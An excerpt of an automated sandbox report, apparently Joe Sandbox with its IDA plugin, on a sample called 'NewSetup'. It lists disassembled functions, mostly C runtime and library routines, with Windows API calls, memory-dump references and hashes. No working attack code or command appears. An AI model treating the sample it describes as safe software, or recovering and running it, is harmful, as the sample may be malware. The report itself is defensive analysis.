                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Yarn
                                                                                                      • String ID: e.$$|=!e.$
                                                                                                      • API String ID: 1767336200-2625508016
                                                                                                      • Opcode ID: 132bd353f5c1f9c1909503c862231be774a838f2f79cb6b85a8544dc48bb5763
                                                                                                      • Instruction ID: 823995cb09c1e9c1722c51f467b18873b233a5def4e415e66f5dc0e170e1bc7e
                                                                                                      • Opcode Fuzzy Hash: 132bd353f5c1f9c1909503c862231be774a838f2f79cb6b85a8544dc48bb5763
                                                                                                      • Instruction Fuzzy Hash: A1E06D223283107FEB0CBA66EC52BBA73DCCB14B60F10002EF90A8A5C1ED10BD944A95
                                                                                                      Function 00236940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002369DC,00000000,?,0024D2B0,?,?,?,00236913,00000004,InitializeCriticalSectionEx,00240D34,00240D3C), ref: 0023694D
                                                                                                      • GetLastError.KERNEL32(?,002369DC,00000000,?,0024D2B0,?,?,?,00236913,00000004,InitializeCriticalSectionEx,00240D34,00240D3C,00000000,?,0022BBBC), ref: 00236957
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0023697F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                      • Opcode ID: ce3a770960a617fb4fcd2bd548a07136e9d7013afc0d232adfb4ce46afc05ef6
                                                                                                      • Instruction ID: 6a9e1b5a4484faa21fb449248e11a8719031191cbb7d990c358602d5bb14f7f0
                                                                                                      • Opcode Fuzzy Hash: ce3a770960a617fb4fcd2bd548a07136e9d7013afc0d232adfb4ce46afc05ef6
                                                                                                      • Instruction Fuzzy Hash: 71E01AB07A0205BAEF201F61EC4EB6C3A59AB52B91F144420F94DA88E0DB71EC649945
                                                                                                      Function 00233F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetConsoleOutputCP.KERNEL32(456001D6,00000000,00000000,?), ref: 00234001
                                                                                                        • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00234253
                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00234299
                                                                                                      • GetLastError.KERNEL32 ref: 0023433C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 2112829910-0
                                                                                                      • Opcode ID: ee51059b929a84c719b07eb4b201340fe84c5556f77e3b61d221b5b0bf4f1785
                                                                                                      • Instruction ID: cf4cfc4086c25db6081b938e6d7dfa85e89ba01ebc346c445ed138fe4616d60c
                                                                                                      • Opcode Fuzzy Hash: ee51059b929a84c719b07eb4b201340fe84c5556f77e3b61d221b5b0bf4f1785
                                                                                                      • Instruction Fuzzy Hash: 51D198B5E102589FCF14DFE8D884AEDBBB4FF09314F2841AAE856EB351D630A951CB50
                                                                                                      Function 0022B295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1740715915-0
                                                                                                      • Opcode ID: f939811fdab27e74b137b6e27c7bba1a58b543b2e635ce940272215f0e3bdb2e
                                                                                                      • Instruction ID: 034b16a4f13fa947d55aff8dcd24da90a7d3d2e20afae49f63686827a2a3e9a8
                                                                                                      • Opcode Fuzzy Hash: f939811fdab27e74b137b6e27c7bba1a58b543b2e635ce940272215f0e3bdb2e
                                                                                                      • Instruction Fuzzy Hash: 4F51D471A24622FFDB26DFD0E891BAA73A4EF04710F14456DEC0657291D771ECA0CB90
                                                                                                      Function 00217220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 002172C5
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00217395
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002173A3
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002173B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2261580123-0
                                                                                                      • Opcode ID: e6d8ea7b23a051676a03a05b8255f8748ca6dc14393462ec70bdfff5eafa1f8b
                                                                                                      • Instruction ID: 53f3afac642ca10e6f550c36a43b782421919c164c98c5a4c32175135559ee24
                                                                                                      • Opcode Fuzzy Hash: e6d8ea7b23a051676a03a05b8255f8748ca6dc14393462ec70bdfff5eafa1f8b
                                                                                                      • Instruction Fuzzy Hash: 4141F5B19143068BDB21DF24C845BEFB7F4BFA4320F144679D82647691EB34E8A5CB91
                                                                                                      Function 00214460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00214495
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 002144B2
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 002144D3
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00214580
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID:
                                                                                                      • API String ID: 593203224-0
                                                                                                      • Opcode ID: 4c4577c80ff28a873996e4f01808e6e58d543981ea111ce3d0fbf0e81321b04a
                                                                                                      • Instruction ID: e6ab17f6e347e09cf7fdc4472a1e28c73b8c9433c6b3dd0c75654b8eab4e6da3
                                                                                                      • Opcode Fuzzy Hash: 4c4577c80ff28a873996e4f01808e6e58d543981ea111ce3d0fbf0e81321b04a
                                                                                                      • Instruction Fuzzy Hash: CF418875D112198FCB10EF98E848BEDBBF5FB69320F544229E80967391D734A990CFA1
                                                                                                      Function 00231DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
                                                                                                      • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00231E2A
                                                                                                      • __dosmaperr.LIBCMT ref: 00231E31
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00231E6B
                                                                                                      • __dosmaperr.LIBCMT ref: 00231E72
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 1913693674-0
                                                                                                      • Opcode ID: dce0d32cee6f2a16a3bbcd92a7e6778ff7abfb4d6d70a4696a587330dba316fe
                                                                                                      • Instruction ID: 7da396cc7891a934dd7dd2fca6d96b71e0c405be5a711f71efc3f522c5382952
                                                                                                      • Opcode Fuzzy Hash: dce0d32cee6f2a16a3bbcd92a7e6778ff7abfb4d6d70a4696a587330dba316fe
                                                                                                      • Instruction Fuzzy Hash: DC21B0B1624226BFDB20AFA5DC8596BB7A9FF05364F108519FC1997111D732EC308BA0
                                                                                                      Function 00222BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1c0d12c9a99588afc0228d4fa87b0174b806bc378e82852da8173d20f038194d
                                                                                                      • Instruction ID: a88b84bcb89b3d6ac77efd8ecf4a730f2091b902b3f6a34e0560bcdb53c8b392
                                                                                                      • Opcode Fuzzy Hash: 1c0d12c9a99588afc0228d4fa87b0174b806bc378e82852da8173d20f038194d
                                                                                                      • Instruction Fuzzy Hash: F021C231224236FF8B20AFE5FC8096AB7ACFF403647114516F855A7210EB32EC348BA0
                                                                                                      Function 002331BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 002331C6
                                                                                                        • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002331FE
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023321E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 158306478-0
                                                                                                      • Opcode ID: 253b1657ea536f7d7d7c11be5dbf875ed1b583fe5a1d08d0e4f73e0484315cf0
                                                                                                      • Instruction ID: 8ebc08137a9a41f3131f248e9e765ac421d26b996f6471121d3e4ebfa39738f5
                                                                                                      • Opcode Fuzzy Hash: 253b1657ea536f7d7d7c11be5dbf875ed1b583fe5a1d08d0e4f73e0484315cf0
                                                                                                      • Instruction Fuzzy Hash: 0811C4F65316267EA7126BB5BC8ECBF6A5CDE86795B100015FE01D1100FFA4DF2085B2
                                                                                                      Function 0021E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021E899
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021E8A3
                                                                                                      • int.LIBCPMT ref: 0021E8BA
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0021C1F6
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0021C210
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021E914
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                      • String ID:
                                                                                                      • API String ID: 1383202999-0
                                                                                                      • Opcode ID: ada35f406293fcb543c6a82799591b507e54fac0e5fc7f408bf9b3c0b3d5f09f
                                                                                                      • Instruction ID: c11387cb3629fc40d0de1bf19bab857dd9cb23d7c0e913788dbd39b0da79b095
                                                                                                      • Opcode Fuzzy Hash: ada35f406293fcb543c6a82799591b507e54fac0e5fc7f408bf9b3c0b3d5f09f
                                                                                                      • Instruction Fuzzy Hash: 891102759251159BCF05EF64C9056FDBBF1AFA4720F350008E8116B292CF749AA0CF81
                                                                                                      Function 0023ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000), ref: 0023ADB7
                                                                                                      • GetLastError.KERNEL32(?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?,?,?,00233CD6,00000000), ref: 0023ADC3
                                                                                                        • Part of subcall function 0023AE20: CloseHandle.KERNEL32(FFFFFFFE,0023ADD3,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?,?), ref: 0023AE30
                                                                                                      • ___initconout.LIBCMT ref: 0023ADD3
                                                                                                        • Part of subcall function 0023ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0023AD91,0023A2DC,?,?,00234390,?,00000000,00000000,?), ref: 0023AE08
                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?), ref: 0023ADE8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                      • String ID:
                                                                                                      • API String ID: 2744216297-0
                                                                                                      • Opcode ID: 623dc61cc681e19b9e34b1fd302f50be916f7a1de0cbcc683530875fd19ca169
                                                                                                      • Instruction ID: 157d96b3f2fbdec397b18e64c51d73b833da8490f18b74337e6051ad5768cce3
                                                                                                      • Opcode Fuzzy Hash: 623dc61cc681e19b9e34b1fd302f50be916f7a1de0cbcc683530875fd19ca169
                                                                                                      • Instruction Fuzzy Hash: 5AF0127A510119BBCF622FD5FC0C99A3F26FF46761F004021FD4885120D7728C609B92
                                                                                                      Function 002204F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00220507
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00220516
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0022051F
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0022052C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: 095853ed0b714497ddfb9c9fee31804be37d140315b2ca83479760357136bf5c
                                                                                                      • Instruction ID: 49369ffbd73760dc1cf695b56936e73221517f2c8ea5ca94d76ef9d35779b183
                                                                                                      • Opcode Fuzzy Hash: 095853ed0b714497ddfb9c9fee31804be37d140315b2ca83479760357136bf5c
                                                                                                      • Instruction Fuzzy Hash: 31F05F74D1020DEBCB00DFB4EA8D99EBBF4FF1E204B914996A412E6110EA30AA449B51
                                                                                                      Function 0022B992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0022B893,?,?,00000000,00000000,00000000,?), ref: 0022B9B7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EncodePointer
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                      • Opcode ID: 8f3e36b5dc4f0d4a15cfb3b9ccf89540dbfd2d4157cf35bf35976f7b29427607
                                                                                                      • Instruction ID: 5611a6c02e564ee5fc3a0c5ff2e73d51f9bc7170177849487342f8150674240e
                                                                                                      • Opcode Fuzzy Hash: 8f3e36b5dc4f0d4a15cfb3b9ccf89540dbfd2d4157cf35bf35976f7b29427607
                                                                                                      • Instruction Fuzzy Hash: 1741593191021ABFCF16DF94EC81AAEBBB5BF48300F188159F91467211D73599A0DF91
                                                                                                      Function 0022B1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0022B475
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
